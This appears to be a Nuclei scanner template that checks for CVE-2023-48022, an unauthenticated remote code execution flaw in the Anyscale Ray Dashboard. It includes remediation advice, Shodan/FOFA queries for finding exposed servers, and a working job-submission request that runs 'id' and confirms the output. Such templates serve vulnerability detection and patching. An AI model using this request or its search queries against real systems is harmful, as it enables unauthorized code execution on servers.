id: CVE-2023-48022

info:
  name: Anyscale Ray - Remote Code Execution
  author: riteshs4hu
  severity: critical
  description: |
    Anyscale Ray 2.6.3 and 2.8.0 contain a remote code execution vulnerability due to insecure job submission API, allowing attackers to execute arbitrary code remotely if they have network access to the Ray Dashboard API.
  impact: |
    Unauthenticated attackers with network access to the Ray Dashboard API can execute arbitrary code remotely as root, leading to complete system compromise.
  remediation: |
    Upgrade Anyscale Ray to version 2.6.4 or later, or version 2.8.1 or later, and restrict network access to the Ray Dashboard API.
  reference:
    - https://bishopfox.com/blog/ray-versions-2-6-3-2-8-0
    - https://vulncheck.com/xdb/497d7fb3b118
    - https://github.com/jakabakos/ShadowRay-RCE-PoC-CVE-2023-48022
    - https://vulncheck.com/xdb/d3bafad9c9f6
    - https://github.com/0x656565/CVE-2023-48022
    - https://nvd.nist.gov/vuln/detail/cve-2023-48022
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-48022
    cwe-id: CWE-78
    epss-score: 0.92192
    epss-percentile: 0.99728
  metadata:
    verified: true
    max-request: 3
    vendor: ray_project
    product: ray
    shodan-query:
      - http.favicon.hash:463802404
      - http.html:"ray dashboard"
    fofa-query:
      - icon_hash=463802404
      - body="ray dashboard"
  tags: cve,cve2023,rce,ray,anyscale,vkev,vuln

variables:
  jobid: "Job_{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /api/jobs/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "entrypoint": "id",
          "submission_id": "{{jobid}}"
        }

      - | # wait for 8 seconds before getting the logs
        GET / HTTP/1.1
        Host: {{Hostname}}

        {{wait_for(8)}}

      - |
        GET /api/jobs/{{jobid}}/logs HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "logs\":")'
          - 'contains(content_type, "application/json")'
          - 'regex("uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)", body)'
        condition: and
# digest: 4a0a004730450221008a4fa6a9c2b274bdaf216f6488e04cf1102078dbf91d8fd7bf58cf700048f4640220364e401c754edb81454d999fab1b079a5764ae4735426118c5bbef8ac84c864c:922c64590222798bb761d5b6d8e72950